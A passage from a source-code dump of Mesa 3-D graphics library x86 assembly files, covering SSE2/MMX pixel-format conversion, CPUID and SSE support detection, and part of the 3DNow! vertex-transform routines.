* of them now. We do the 2 pixel case first because the data
* will be aligned.
*/
testl $2, %edx
je .L47
movq (%ebx), %xmm0
addl $8, %ebx
movdqa %xmm0, %xmm3
movdqa %xmm0, %xmm4
andps %xmm1, %xmm0
andps %xmm2, %xmm3
pslldq $2, %xmm4
psrldq $2, %xmm3
andps %xmm2, %xmm4
orps %xmm4, %xmm3
orps %xmm3, %xmm0
movq %xmm0, (%ecx)
addl $8, %ecx
.L47:
testl $1, %edx
je .L46
DO_ONE_LAST_PIXEL()
.L46:
popl %ebx
popl %esi
ret
.size _generic_read_RGBA_span_BGRA8888_REV_SSE2, .-_generic_read_RGBA_span_BGRA8888_REV_SSE2
#define MASK_565_L 0x07e0f800
#define MASK_565_H 0x0000001f
/* Setting SCALE_ADJUST to 5 gives a perfect match with the
* classic C implementation in Mesa. Setting SCALE_ADJUST
* to 0 is slightly faster but at a small cost to accuracy.
*/
#define SCALE_ADJUST 5
#if SCALE_ADJUST == 5
#define PRESCALE_L 0x00100001
#define PRESCALE_H 0x00000200
#define SCALE_L 0x40C620E8
#define SCALE_H 0x0000839d
#elif SCALE_ADJUST == 0
#define PRESCALE_L 0x00200001
#define PRESCALE_H 0x00000800
#define SCALE_L 0x01040108
#define SCALE_H 0x00000108
#else
#error SCALE_ADJUST must either be 5 or 0.
#endif
#define ALPHA_L 0x00000000
#define ALPHA_H 0x00ff0000
/**
* MMX optimized version of the RGB565 to RGBA copy routine.
*/
.text
.globl _generic_read_RGBA_span_RGB565_MMX
.hidden _generic_read_RGBA_span_RGB565_MMX
.type _generic_read_RGBA_span_RGB565_MMX, @function
_generic_read_RGBA_span_RGB565_MMX:
#ifdef USE_INNER_EMMS
emms
#endif
movl 4(%esp), %eax /* source pointer */
movl 8(%esp), %edx /* destination pointer */
movl 12(%esp), %ecx /* number of pixels to copy */
pushl $MASK_565_H
pushl $MASK_565_L
movq (%esp), %mm5
pushl $PRESCALE_H
pushl $PRESCALE_L
movq (%esp), %mm6
pushl $SCALE_H
pushl $SCALE_L
movq (%esp), %mm7
pushl $ALPHA_H
pushl $ALPHA_L
movq (%esp), %mm3
addl $32,%esp
sarl $2, %ecx
jle .L01 /* Bail early if the count is negative. */
jmp .L02
.L03:
/* Fetch 4 RGB565 pixels into %mm4. Distribute the first and
* second pixels into the four words of %mm0 and %mm2.
*/
movq (%eax), %mm4
addl $8, %eax
pshufw $0x00, %mm4, %mm0
pshufw $0x55, %mm4, %mm2
/* Mask the pixels so that each word of each register contains only
* one color component.
*/
pand %mm5, %mm0
pand %mm5, %mm2
/* Adjust the component values so that they are as small as possible,
* but large enough so that we can multiply them by an unsigned 16-bit
* number and get a value as large as 0x00ff0000.
*/
pmullw %mm6, %mm0
pmullw %mm6, %mm2
#if SCALE_ADJUST > 0
psrlw $SCALE_ADJUST, %mm0
psrlw $SCALE_ADJUST, %mm2
#endif
/* Scale the input component values to be on the range
* [0, 0x00ff0000]. This it the real magic of the whole routine.
*/
pmulhuw %mm7, %mm0
pmulhuw %mm7, %mm2
/* Always set the alpha value to 0xff.
*/
por %mm3, %mm0
por %mm3, %mm2
/* Pack the 16-bit values to 8-bit values and store the converted
* pixel data.
*/
packuswb %mm2, %mm0
movq %mm0, (%edx)
addl $8, %edx
pshufw $0xaa, %mm4, %mm0
pshufw $0xff, %mm4, %mm2
pand %mm5, %mm0
pand %mm5, %mm2
pmullw %mm6, %mm0
pmullw %mm6, %mm2
#if SCALE_ADJUST > 0
psrlw $SCALE_ADJUST, %mm0
psrlw $SCALE_ADJUST, %mm2
#endif
pmulhuw %mm7, %mm0
pmulhuw %mm7, %mm2
por %mm3, %mm0
por %mm3, %mm2
packuswb %mm2, %mm0
movq %mm0, (%edx)
addl $8, %edx
subl $1, %ecx
.L02:
jne .L03
/* At this point there can be at most 3 pixels left to process. If
* there is either 2 or 3 left, process 2.
*/
movl 12(%esp), %ecx
testl $0x02, %ecx
je .L04
movd (%eax), %mm4
addl $4, %eax
pshufw $0x00, %mm4, %mm0
pshufw $0x55, %mm4, %mm2
pand %mm5, %mm0
pand %mm5, %mm2
pmullw %mm6, %mm0
pmullw %mm6, %mm2
#if SCALE_ADJUST > 0
psrlw $SCALE_ADJUST, %mm0
psrlw $SCALE_ADJUST, %mm2
#endif
pmulhuw %mm7, %mm0
pmulhuw %mm7, %mm2
por %mm3, %mm0
por %mm3, %mm2
packuswb %mm2, %mm0
movq %mm0, (%edx)
addl $8, %edx
.L04:
/* At this point there can be at most 1 pixel left to process.
* Process it if needed.
*/
testl $0x01, %ecx
je .L01
movzxw (%eax), %ecx
movd %ecx, %mm4
pshufw $0x00, %mm4, %mm0
pand %mm5, %mm0
pmullw %mm6, %mm0
#if SCALE_ADJUST > 0
psrlw $SCALE_ADJUST, %mm0
#endif
pmulhuw %mm7, %mm0
por %mm3, %mm0
packuswb %mm0, %mm0
movd %mm0, (%edx)
.L01:
#ifdef USE_INNER_EMMS
emms
#endif
ret
#endif /* !defined(__DJGPP__) && !defined(__MINGW32__) */
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 5,335
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/common_x86_asm.S
|
/*
* Mesa 3-D graphics library
* Version: 6.3
*
* Copyright (C) 1999-2004 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
/*
* Check extended CPU capabilities. Now justs returns the raw CPUID
* feature information, allowing the higher level code to interpret the
* results.
*
* Written by Holger Waechtler <holger@akaflieg.extern.tu-berlin.de>
*
* Cleaned up and simplified by Gareth Hughes <gareth@valinux.com>
*
*/
/*
* NOTE: Avoid using spaces in between '(' ')' and arguments, especially
* with macros like CONST, LLBL that expand to CONCAT(...). Putting spaces
* in there will break the build on some platforms.
*/
#include "matypes.h"
#include "common_x86_features.h"
SEG_TEXT
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_has_cpuid)
HIDDEN(_mesa_x86_has_cpuid)
GLNAME(_mesa_x86_has_cpuid):
/* Test for the CPUID command. If the ID Flag bit in EFLAGS
* (bit 21) is writable, the CPUID command is present */
PUSHF_L
POP_L (EAX)
MOV_L (EAX, ECX)
XOR_L (CONST(0x00200000), EAX)
PUSH_L (EAX)
POPF_L
PUSHF_L
POP_L (EAX)
/* Verify the ID Flag bit has been written. */
CMP_L (ECX, EAX)
SETNE (AL)
XOR_L (CONST(0xff), EAX)
RET
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_cpuid)
HIDDEN(_mesa_x86_cpuid)
GLNAME(_mesa_x86_cpuid):
MOV_L (REGOFF(4, ESP), EAX) /* cpuid op */
PUSH_L (EDI)
PUSH_L (EBX)
CPUID
MOV_L (REGOFF(16, ESP), EDI) /* *eax */
MOV_L (EAX, REGIND(EDI))
MOV_L (REGOFF(20, ESP), EDI) /* *ebx */
MOV_L (EBX, REGIND(EDI))
MOV_L (REGOFF(24, ESP), EDI) /* *ecx */
MOV_L (ECX, REGIND(EDI))
MOV_L (REGOFF(28, ESP), EDI) /* *edx */
MOV_L (EDX, REGIND(EDI))
POP_L (EBX)
POP_L (EDI)
RET
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_cpuid_eax)
HIDDEN(_mesa_x86_cpuid_eax)
GLNAME(_mesa_x86_cpuid_eax):
MOV_L (REGOFF(4, ESP), EAX) /* cpuid op */
PUSH_L (EBX)
CPUID
POP_L (EBX)
RET
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_cpuid_ebx)
HIDDEN(_mesa_x86_cpuid_ebx)
GLNAME(_mesa_x86_cpuid_ebx):
MOV_L (REGOFF(4, ESP), EAX) /* cpuid op */
PUSH_L (EBX)
CPUID
MOV_L (EBX, EAX) /* return EBX */
POP_L (EBX)
RET
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_cpuid_ecx)
HIDDEN(_mesa_x86_cpuid_ecx)
GLNAME(_mesa_x86_cpuid_ecx):
MOV_L (REGOFF(4, ESP), EAX) /* cpuid op */
PUSH_L (EBX)
CPUID
MOV_L (ECX, EAX) /* return ECX */
POP_L (EBX)
RET
ALIGNTEXT4
GLOBL GLNAME(_mesa_x86_cpuid_edx)
HIDDEN(_mesa_x86_cpuid_edx)
GLNAME(_mesa_x86_cpuid_edx):
MOV_L (REGOFF(4, ESP), EAX) /* cpuid op */
PUSH_L (EBX)
CPUID
MOV_L (EDX, EAX) /* return EDX */
POP_L (EBX)
RET
#ifdef USE_SSE_ASM
/* Execute an SSE instruction to see if the operating system correctly
* supports SSE. A signal handler for SIGILL should have been set
* before calling this function, otherwise this could kill the client
* application.
*
* -----> !!!! ATTENTION DEVELOPERS !!!! <-----
*
* If you're debugging with gdb and you get stopped in this function,
* just type 'continue'! Execution will proceed normally.
* See freedesktop.org bug #1709 for more info.
*/
ALIGNTEXT4
GLOBL GLNAME( _mesa_test_os_sse_support )
HIDDEN(_mesa_test_os_sse_support)
GLNAME( _mesa_test_os_sse_support ):
XORPS ( XMM0, XMM0 )
RET
/* Perform an SSE divide-by-zero to see if the operating system
* correctly supports unmasked SIMD FPU exceptions. Signal handlers for
* SIGILL and SIGFPE should have been set before calling this function,
* otherwise this could kill the client application.
*/
ALIGNTEXT4
GLOBL GLNAME( _mesa_test_os_sse_exception_support )
HIDDEN(_mesa_test_os_sse_exception_support)
GLNAME( _mesa_test_os_sse_exception_support ):
PUSH_L ( EBP )
MOV_L ( ESP, EBP )
SUB_L ( CONST( 8 ), ESP )
/* Save the original MXCSR register value.
*/
STMXCSR ( REGOFF( -4, EBP ) )
/* Unmask the divide-by-zero exception and perform one.
*/
STMXCSR ( REGOFF( -8, EBP ) )
AND_L ( CONST( 0xfffffdff ), REGOFF( -8, EBP ) )
LDMXCSR ( REGOFF( -8, EBP ) )
XORPS ( XMM0, XMM0 )
PUSH_L ( CONST( 0x3f800000 ) )
PUSH_L ( CONST( 0x3f800000 ) )
PUSH_L ( CONST( 0x3f800000 ) )
PUSH_L ( CONST( 0x3f800000 ) )
MOVUPS ( REGIND( ESP ), XMM1 )
DIVPS ( XMM0, XMM1 )
/* Restore the original MXCSR register value.
*/
LDMXCSR ( REGOFF( -4, EBP ) )
LEAVE
RET
#endif
#if defined (__ELF__) && defined (__linux__)
.section .note.GNU-stack,"",%progbits
#endif
|
AIFM-sys/AIFM
| 18,716
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86/3dnow_xform3.S
|
/* $Id: 3dnow_xform3.S,v 1.1.1.1 2012/03/29 17:22:10 uid42307 Exp $ */
/*
* Mesa 3-D graphics library
* Version: 3.5
*
* Copyright (C) 1999-2001 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_3DNOW_ASM
#include "matypes.h"
#include "xform_args.h"
SEG_TEXT
#define FRAME_OFFSET 4
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_general )
HIDDEN(_mesa_3dnow_transform_points3_general)
GLNAME( _mesa_3dnow_transform_points3_general ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPGR_2 ) )
PREFETCHW ( REGIND(EDX) )
ALIGNTEXT16
LLBL( G3TPGR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM2 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
MOVQ ( MM0, MM1 ) /* x1 | x0 */
PUNPCKLDQ ( MM2, MM2 ) /* x2 | x2 */
PUNPCKLDQ ( MM0, MM0 ) /* x0 | x0 */
MOVQ ( MM2, MM5 ) /* x2 | x2 */
PUNPCKHDQ ( MM1, MM1 ) /* x1 | x1 */
PFMUL ( REGOFF(32, ECX), MM2 ) /* x2*m9 | x2*m8 */
MOVQ ( MM0, MM3 ) /* x0 | x0 */
PFMUL ( REGOFF(40, ECX), MM5 ) /* x2*m11 | x2*m10 */
MOVQ ( MM1, MM4 ) /* x1 | x1 */
PFMUL ( REGIND(ECX), MM0 ) /* x0*m1 | x0*m0 */
PFADD ( REGOFF(48, ECX), MM2 ) /* x2*m9+m13 | x2*m8+m12 */
PFMUL ( REGOFF(16, ECX), MM1 ) /* x1*m5 | x1*m4 */
PFADD ( REGOFF(56, ECX), MM5 ) /* x2*m11+m15 | x2*m10+m14 */
PFADD ( MM0, MM1 ) /* x0*m1+x1*m5 | x0*m0+x1*m4 */
PFMUL ( REGOFF(8, ECX), MM3 ) /* x0*m3 | x0*m2 */
PFADD ( MM1, MM2 ) /* r1 | r0 */
PFMUL ( REGOFF(24, ECX), MM4 ) /* x1*m7 | x1*m6 */
ADD_L ( CONST(16), EDX ) /* next output vertex */
PFADD ( MM3, MM4 ) /* x0*m3+x1*m7 | x0*m2+x1*m6 */
MOVQ ( MM2, REGOFF(-16, EDX) ) /* write r0, r1 */
PFADD ( MM4, MM5 ) /* r3 | r2 */
MOVQ ( MM5, REGOFF(-8, EDX) ) /* write r2, r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPGR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPGR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_perspective )
HIDDEN(_mesa_3dnow_transform_points3_perspective)
GLNAME( _mesa_3dnow_transform_points3_perspective ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(4), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_4), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TPPR_2 ) )
PREFETCH ( REGIND(EAX) )
PREFETCHW ( REGIND(EDX) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVQ ( REGOFF(32, ECX), MM1 ) /* m21 | m20 */
MOVD ( REGOFF(40, ECX), MM2 ) /* | m22 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
ALIGNTEXT16
LLBL( G3TPPR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVD ( REGOFF(8, EAX), MM5 ) /* | x2 */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
PXOR ( MM7, MM7 ) /* 0 | 0 */
MOVQ ( MM5, MM6 ) /* | x2 */
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PFSUB ( MM5, MM7 ) /* | -x2 */
PFMUL ( MM2, MM6 ) /* | x2*m22 */
PUNPCKLDQ ( MM5, MM5 ) /* x2 | x2 */
ADD_L ( CONST(16), EDX ) /* next r */
PFMUL ( MM1, MM5 ) /* x2*m21 | x2*m20 */
PFADD ( MM3, MM6 ) /* | x2*m22+m32 */
PFADD ( MM4, MM5 ) /* x1*m11+x2*m21 | x0*m00+x2*m20 */
MOVQ ( MM5, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVD ( MM6, REGOFF(-8, EDX) ) /* write r2 */
MOVD ( MM7, REGOFF(-4, EDX) ) /* write r3 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TPPR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TPPR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_3d )
HIDDEN(_mesa_3dnow_transform_points3_3d)
GLNAME( _mesa_3dnow_transform_points3_3d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3R_2 ) )
PREFETCH ( REGIND(EAX) )
PREFETCH ( REGIND(EDX) )
MOVD ( REGOFF(8, ECX), MM7 ) /* | m2 */
PUNPCKLDQ ( REGOFF(24, ECX), MM7 ) /* m6 | m2 */
ALIGNTEXT16
LLBL( G3TP3R_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM0 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM1 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
MOVQ ( MM0, MM2 ) /* x1 | x0 */
ADD_L ( CONST(16), EDX ) /* next r */
PUNPCKLDQ ( MM2, MM2 ) /* x0 | x0 */
MOVQ ( MM0, MM3 ) /* x1 | x0 */
PFMUL ( REGIND(ECX), MM2 ) /* x0*m1 | x0*m0 */
PUNPCKHDQ ( MM3, MM3 ) /* x1 | x1 */
MOVQ ( MM1, MM4 ) /* | x2 */
PFMUL ( REGOFF(16, ECX), MM3 ) /* x1*m5 | x1*m4 */
PUNPCKLDQ ( MM4, MM4 ) /* x2 | x2 */
PFADD ( MM2, MM3 ) /* x0*m1+x1*m5 | x0*m0+x1*m4 */
PFMUL ( REGOFF(32, ECX), MM4 ) /* x2*m9 | x2*m8 */
PFADD ( REGOFF(48, ECX), MM3 ) /* x0*m1+...+m11 | x0*m0+x1*m4+m12 */
PFMUL ( MM7, MM0 ) /* x1*m6 | x0*m2 */
PFADD ( MM4, MM3 ) /* r1 | r0 */
PFMUL ( REGOFF(40, ECX), MM1 ) /* | x2*m10 */
PUNPCKLDQ ( REGOFF(56, ECX), MM1 ) /* m14 | x2*m10 */
PFACC ( MM0, MM1 )
MOVQ ( MM3, REGOFF(-16, EDX) ) /* write r0, r1 */
PFACC ( MM1, MM1 ) /* | r2 */
MOVD ( MM1, REGOFF(-8, EDX) ) /* write r2 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP3R_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3R_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_3d_no_rot )
HIDDEN(_mesa_3dnow_transform_points3_3d_no_rot)
GLNAME( _mesa_3dnow_transform_points3_3d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP3NRR_2 ) )
PREFETCH ( REGIND(EAX) )
PREFETCHW ( REGIND(EDX) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVD ( REGOFF(40, ECX), MM2 ) /* | m22 */
PUNPCKLDQ ( MM2, MM2 ) /* m22 | m22 */
MOVQ ( REGOFF(48, ECX), MM1 ) /* m31 | m30 */
MOVD ( REGOFF(56, ECX), MM3 ) /* | m32 */
PUNPCKLDQ ( MM3, MM3 ) /* m32 | m32 */
ALIGNTEXT16
LLBL( G3TP3NRR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM5 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCHW ( REGIND(EAX) )
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
PFADD ( MM1, MM4 ) /* x1*m11+m31 | x0*m00+m30 */
PFMUL ( MM2, MM5 ) /* | x2*m22 */
PFADD ( MM3, MM5 ) /* | x2*m22+m32 */
MOVQ ( MM4, REGIND(EDX) ) /* write r0, r1 */
ADD_L ( CONST(16), EDX ) /* next r */
DEC_L ( ESI ) /* decrement vertex counter */
MOVD ( MM5, REGOFF(-8, EDX) ) /* write r2 */
JNZ ( LLBL( G3TP3NRR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP3NRR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_2d )
HIDDEN(_mesa_3dnow_transform_points3_2d)
GLNAME( _mesa_3dnow_transform_points3_2d ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2R_3) )
PREFETCH ( REGIND(EAX) )
PREFETCHW ( REGIND(EDX) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(16, ECX), MM0 ) /* m10 | m00 */
MOVD ( REGOFF(4, ECX), MM1 ) /* | m01 */
PUNPCKLDQ ( REGOFF(20, ECX), MM1 ) /* m11 | m01 */
MOVQ ( REGOFF(48, ECX), MM2 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2R_2 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM3 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM5 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
MOVQ ( MM3, MM4 ) /* x1 | x0 */
PFMUL ( MM0, MM3 ) /* x1*m10 | x0*m00 */
ADD_L ( CONST(16), EDX ) /* next r */
PFMUL ( MM1, MM4 ) /* x1*m11 | x0*m01 */
PFACC ( MM4, MM3 ) /* x0*m00+x1*m10 | x0*m01+x1*m11 */
MOVD ( MM5, REGOFF(-8, EDX) ) /* write r2 (=x2) */
PFADD ( MM2, MM3 ) /* x0*...*m10+m30 | x0*...*m11+m31 */
MOVQ ( MM3, REGOFF(-16, EDX) ) /* write r0, r1 */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2R_2 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2R_3 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_2d_no_rot )
HIDDEN(_mesa_3dnow_transform_points3_2d_no_rot)
GLNAME( _mesa_3dnow_transform_points3_2d_no_rot ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
MOV_L ( REGOFF(V4F_COUNT, EAX), EDX )
MOV_L ( EDX, REGOFF(V4F_COUNT, ECX) )
PUSH_L ( EDI )
MOV_L ( REGOFF(V4F_START, ECX), EDX )
MOV_L ( ESI, ECX )
MOV_L ( REGOFF(V4F_COUNT, EAX), ESI )
MOV_L ( REGOFF(V4F_STRIDE, EAX), EDI )
MOV_L ( REGOFF(V4F_START, EAX), EAX )
TEST_L ( ESI, ESI )
JZ ( LLBL( G3TP2NRR_2 ) )
PREFETCH ( REGIND(EAX) )
PREFETCHW ( REGIND(EDX) )
MOVD ( REGIND(ECX), MM0 ) /* | m00 */
PUNPCKLDQ ( REGOFF(20, ECX), MM0 ) /* m11 | m00 */
MOVQ ( REGOFF(48, ECX), MM1 ) /* m31 | m30 */
ALIGNTEXT16
LLBL( G3TP2NRR_1 ):
PREFETCHW ( REGOFF(32, EDX) ) /* prefetch 2 vertices ahead */
MOVQ ( REGIND(EAX), MM4 ) /* x1 | x0 */
MOVD ( REGOFF(8, EAX), MM5 ) /* | x2 */
ADD_L ( EDI, EAX ) /* next vertex */
PREFETCH ( REGIND(EAX) )
PFMUL ( MM0, MM4 ) /* x1*m11 | x0*m00 */
ADD_L ( CONST(16), EDX ) /* next r */
PFADD ( MM1, MM4 ) /* x1*m11+m31 | x0*m00+m30 */
MOVQ ( MM4, REGOFF(-16, EDX) ) /* write r0, r1 */
MOVD ( MM5, REGOFF(-8, EDX) ) /* write r2 (=x2) */
DEC_L ( ESI ) /* decrement vertex counter */
JNZ ( LLBL( G3TP2NRR_1 ) ) /* cnt > 0 ? -> process next vertex */
LLBL( G3TP2NRR_2 ):
FEMMS
POP_L ( EDI )
POP_L ( ESI )
RET
ALIGNTEXT16
GLOBL GLNAME( _mesa_3dnow_transform_points3_identity )
HIDDEN(_mesa_3dnow_transform_points3_identity)
GLNAME( _mesa_3dnow_transform_points3_identity ):
PUSH_L ( ESI )
MOV_L ( ARG_DEST, ECX )
MOV_L ( ARG_MATRIX, ESI )
MOV_L ( ARG_SOURCE, EAX )
MOV_L ( CONST(3), REGOFF(V4F_SIZE, ECX) )
OR_B ( CONST(VEC_SIZE_3), REGOFF(V4F_FLAGS, ECX) )
